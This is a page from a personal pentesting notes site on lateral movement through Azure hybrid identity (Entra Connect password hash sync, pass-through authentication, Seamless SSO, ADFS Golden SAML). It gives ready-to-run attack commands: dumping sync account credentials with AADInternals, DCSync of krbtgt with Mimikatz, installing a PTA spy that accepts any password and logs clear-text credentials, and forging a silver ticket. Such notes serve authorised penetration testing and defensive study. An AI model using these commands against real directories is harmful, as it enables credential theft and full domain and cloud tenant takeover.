Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
        • MFASweep
        • GraphRunner
        • Azure SQL databases
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • Entra Connect
  • PHS (Password Hash Sync)
  • PTA (Pass-through Authentication)
  • Seamless SSO
  • Federation
  • ADFS
  • Golden SAML attack
  1. Cloud
  2. Azure
  3. Lateral Movement

Hybrid Identity

PreviousApplication ProxyNextWindows executables and DLL's

Last updated 3 months ago

Organizations have resources, devices and applications both on-premises and in the cloud. Many enterprises se their on-prem AD identities to access Azure applications to avoid managing separate identities on both.

A single user identity for authentication and authorization to all resources, regardless of location is a hybrid identity

Entra Connect

An on-premises AD can be integrated with Entra ID using Entra Connect with the following methods. Every method supports Single Sign-on (SSO):

  • Password Hash Sync (PHS)

  • Pass-Through Authentication (PTA)

  • Federation

PHS (Password Hash Sync)

It syncs users and a hash of their password hashes (not clear-text or original hashes) for on-prem AD to Entra ID. This is the simplest and most popular method for getting a hybrid identity.

PHS is required for features like identity protection and AAD domain services

By default, password expiry and account expiry are not reflected in Entra ID. That means a user whose on-prem password is expired, can continue to access Azure resources using the old password.

For on-prem an account with the name MSOL_<installationID>is automatically created. This account has replication (DCSync) permissions in the on-prem AD.

Enumerate MSOL users:

Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl

Once the Entra connect server is compromised. Use the below commands from the AADInternals module. Extract credentials of the MSOL_* and Sync_* accounts in clear text:

Import-Module AADInternals\AADInternals.psd1

Get-AADIntSyncCredentials

Using the creds of MSOL_* account, we can run DCSync against the on- prem AD:

runas /netonly /user:defeng.corp\MSOL_782bef6aa0a9 cmd Invoke-Mimikatz -Command '"lsadump::dcsync/user:defeng\krbtgt /domain:defeng.corp /dc:defeng-dc.defeng.corp"'

PTA (Pass-through Authentication)

Microsoft Entra pass-through authentication allows your users to sign in to both on-premises and cloud-based applications using the same passwords. When users sign in using Microsoft Entra ID, this feature validates users' passwords directly against your on-premises Active Directory.

Import-Module AADInternals\AADInternals.psd1

Install the PTA agent and collect credentials.

Install-AADIntPTASpy

All passwords are now accepted and credentials collected to
C:\PTASpy\PTASpy.csv

# Get clear-text passwords from users authenticating
Get-AADIntPTASpyLog

Seamless SSO

Entra Seamless SSO automatically signs users in when they are on-prem domain-joined machine. There is no need to use passwords to log in to Entra ID and on-prem application. On on-prem AD a user AZUREADSSOACCIs created. This account's Kebreros decryption key is shared with entra ID.

Password/key of the AZUREADSSOACC never changes

This means that if we can compromise the NTLM hash of the machine account, we can create silver tickets for any synced on-prem user.

First get NTLM hash

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:defeng.corp /dc:defeng-dc.defeng.corp"'

We just need the userPrincipalName and SID of the user to create the Silver ticket that can be used from any machine connected to the internet.

Create silver ticket:

Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin1 /sid:S-1-5-21-938785110-3291390659-577725712 /id:1108 /domain:defeng.corp /rc4:<> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'

Federation

In case of federationa trust is established between unrelated parties like on-premise AD and Entra ID. Users can access cloud applications by using their on-prem credentials.

ADFS

AD FS is a claimed-based identity model. Claims are simply statements (for example name, identity, groupp), made about users that are used primarily for authorizing access to claim-based applications located anywhere on the internet.

A user is identified by ImmutableID. It is globally unique and stored in Entra ID. The ImmuatbleID is stored on-prem as ms-DS-ConsistencyGuidfor the user and/or can be derived from the GUID of the user

Golden SAML attack

In ADFS, A SAML response is signed by a token-signing certificate. If the certificate is compromised, it is possible to authenticate to the Entra ID as ANY user in Entra ID. The certificate can be extracted from the AD FS server with Domain Admin privileges and then can be used from the internet connectd machine.

If we compromise a server with the authentication agent running, we can get the credentials for users in plain-text. We will first need to upload AADInternals.zip . Next, unzip it and run :

☁️
https://github.com/Gerenios/AADInternals